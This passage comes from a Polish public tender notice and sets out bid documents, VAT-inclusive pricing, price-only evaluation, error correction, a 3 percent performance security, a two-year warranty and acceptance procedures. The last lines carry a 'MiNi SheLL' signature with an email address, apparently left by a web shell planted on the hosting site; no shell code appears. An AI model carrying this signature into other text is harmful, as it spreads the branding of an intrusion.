udzielenie zamówienia musi być podpisana i oznaczona w taki sposób by prawnie zobowiązywała wszystkie podmioty. 4.	Dokumenty wymienione w SIWZ rozdziale IX pkt 5 albo odpowiadające im dokumenty określone w SIWZ rozdziale IX pkt 6 składa każdy z wykonawców wspólnie ubiegający się o udzielenie zamówienia oddzielnie, natomiast dokumenty wymienione w SIWZ rozdziale IX pkt 2 wykonawcy mogą złożyć wspólnie. 5.	Oświadczenie, o którym mowa w SIWZ rozdziale IX pkt 1, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą złożyć łącznie -na jednym druku - w przypadku łącznego spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, albo każdy z Wykonawców odrębnie, w przypadku jeżeli taki Wykonawca spełnia samodzielnie wszystkie warunki udziału w postępowaniu. 
OPIS SPOSOBU OBLICZANIA CENY OFERTY 1.	Cenę oferty należy podać brutto tj. z uwzględnieniem podatku od towarów i usług -VAT oraz ceny jednostkowe netto bez podatku od towarów i usług -VAT.
2.	Cena brutto podana w ofercie powinna zawierać wszystkie koszty związane z realizacją przedmiotu zamówienia.
3.	Cena brutto oferty ma stanowić kwotę wynagrodzenia, jaką Wykonawca chce uzyskać za wykonanie całego przedmiotu zamówienia. Oznacza to, że Wykonawca przygotowując ofertę, oprócz prac wynikających z opisu przedmiot zamówienia i projektu umowy powinien przewidzieć wszystkie koszty i okoliczności, które towarzyszą lub mogą towarzyszyć wykonaniu tego zamówienia i które są konieczne dla prawidłowej realizacji tego zamówienia. 
4.	Ceny należy podać w złotych polskich z dokładnością do dwóch miejsc po przecinku.5.Zamawiający nie przewiduje rozliczeń w walutach obcych.
6.	Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz wspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek zapłacić zgodnie z obowiązującymi przepisami. Taka sama sytuacja nastąpi w przypadku innych podmiotów zagranicznych, które na podstawie odrębnych przepisów nie są zobowiązane do uiszczenia podatku VAT na terenie Polski. Wykonawcy, o których mowa w niniejszym punkcie winni na Formularzu OFERTA zaznaczyć, że ich cena ofertowa nie zawiera należnego podatku VAT i dlaczego. 
7.	Zamawiający w celu ustalenia czy oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, zwróci się do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny.
8.	Zamawiający odrzuci ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień potwierdzi, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. KRYTERIA OCENY OFERT ORAZ ICH ZNACZENIE ORAZ SPOSÓB OCENY OFERT 1.Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami i ich znaczeniem oraz w następujący sposób będzie oceniać oferty w poszczególnych kryteriach: 100 procent cena 2.Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów. 3.Jeżeli nie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez niego ofert dodatkowych. Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach. 
TRYB OCENY OFERT, WYJAŚNIENIE TREŚCI OFERT I DOKUMENTÓW, POPRAWIANIE STWIERDZONYCH OMYŁEK 1.	Dokonując oceny ofert Zamawiający będzie stosował wyłącznie kryteria określone w SIWZ.
2.	W trakcie procedury oceny ofert Zamawiający określi czy każda z ofert:1	została prawidłowo podpisana;
2.2	zawiera wszystkie wymagane dokumenty i oświadczenia;
2.3	spełnia warunki określone w ustawie Pzp i SIWZ.
3.	W toku badania i oceny ofert Zamawiający:
3.1	wezwie Wykonawców, którzy w oznaczonym terminie nie złożyli oświadczeń, dokumentów, 
o których mowa w rozdziale IX SIWZ -art. 25 ust. 1 ustawy Pzp; lub pełnomocnictw, lub którzy złożyli dokumenty zawierające błędy - do ich uzupełnienia, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty, o których mowa powyżej powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert;
3.2	może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert lub oświadczeń i dokumentów, o których mowa w rozdziale IX SIWZ;
3.3	Poprawi oczywiste omyłki pisarskie i oczywiste omyłki rachunkowe z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek omyłek rachunkowych; o dokonanych poprawkach Zamawiający zawiadomi niezwłocznie Wykonawcę, którego oferta została poprawiona. poprawi omyłki polegające na niezgodności oferty ze SIWZ, niepowodujące istotnych zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona;
3.4	w celu ustalenia, czy oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, zwróci się do Wykonawcy o udzielenie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny.
4.	Oświadczenia, dokumenty, o których mowa w pkt 3 Wykonawcy składają w formie pisemnej, nie później niż w dniu wyznaczonym przez Zamawiającego.
5.	Niedopuszczalne jest prowadzenie negocjacji między Zamawiającym a Wykonawcą dotyczących złożonej oferty oraz, z zastrzeżeniem stwierdzonych omyłek, o których mowa w pkt 3 ppkt. 3.3. i 3.4. dokonywanie jakiejkolwiek zmiany w treści złożonej oferty.
 ZABEZPIECZENIE NALEŻYTEGO WYKONANIA UMOWY. 1.	Wykonawca, przed podpisaniem umowy, zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na kwotę stanowiącą 3 procent zaoferowanej ceny brutto. 
 w jednej lub kilku następujących formach -do wyboru:
-	pieniądzu, przelewem na wskazany przez Zamawiającego rachunek bankowy podany przez Zamawiającego przed podpisaniem umowy;
-	poręczeniach bankowych;
-	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo - kredytowych;
-	gwarancjach bankowych;
-	gwarancjach ubezpieczeniowych;
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości -t. jedn. Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm.
2.	Dopuszcza się zmianę formy zabezpieczenia zgodnie z zapisami art. 149 ustawy Pzp.
3.	W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.
4.	Zamawiający zwróci zabezpieczenie należytego wykonania umowy w terminie i na warunkach określonych we wzorze umowy
 OKRES GWARANCJI JAKOŚCI Wymagany okres gwarancji jakości 2 lata, od daty odbioru prac tj. podpisania końcowego protokołu odbioru prac. 
ODBIORY PRAC 1.	Wykonawca po zakończeniu prac, za który zamierza wystawić fakturę, zgłasza na piśmie do Zamawiającego gotowość do przeprowadzenia odbioru końcowego i dostarcza opracowania objęte przedmiotem zamówienia.  
2.	W ciągu 10 dni, od daty otrzymania dokumentacji, o którym mowa w ust. 1, Zamawiający dokonuje oceny prawidłowości wykonywanych prac. 
3.	W przypadku stwierdzenia w czasie kontroli nieprawidłowej realizacji prac Zamawiający dokumentuje uchybienia w postaci protokółu usterek, w którym opisuje uchybienia.  
4.	Wykonawca ma obowiązek niezwłocznie usunąć uchybienia.
5.	Protokół nienależytego wykonania prac zostaje wystawiony i podpisany przez upoważnione osoby Zamawiającego lub osobę przez niego upoważnioną, po 1 egzemplarzu dla każdego podmiotu. 
6.	Po podpisaniu protokołu nienależytego wykonania prac Zamawiający może:
-	żądać zapłaty kar z tytułu nienależytego wykonania Umowy;
-	wezwać Wykonawcę do usunięcie uchybień oraz wyznaczyć termin usunięcia uchybień, który nie może być dłuższy niż 10 dni.
7.	Po usunięciu uchybień powtarzana jest procedura odbioru prac opisana powyżej. Wykonawca zobowiązany jest do zawiadomienia Zamawiającego o usunięciu uchybień oraz uprawniony jest do żądania wyznaczenia terminu odbioru prac uprzednio zakwestionowanych jako wadliwych.
8.	W przypadku stwierdzenia braku uchybień następuje odbiór prac. 
9.	Protokół, o którym mowa w ust. 8  podpisany jest przez upoważnione osoby -Zamawiającego lub osobę przez niego upoważnioną oraz upoważnionego przedstawiciela Wykonawcy w 2 egzemplarzach -po jednym egzemplarzu dla każdego podmiotu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com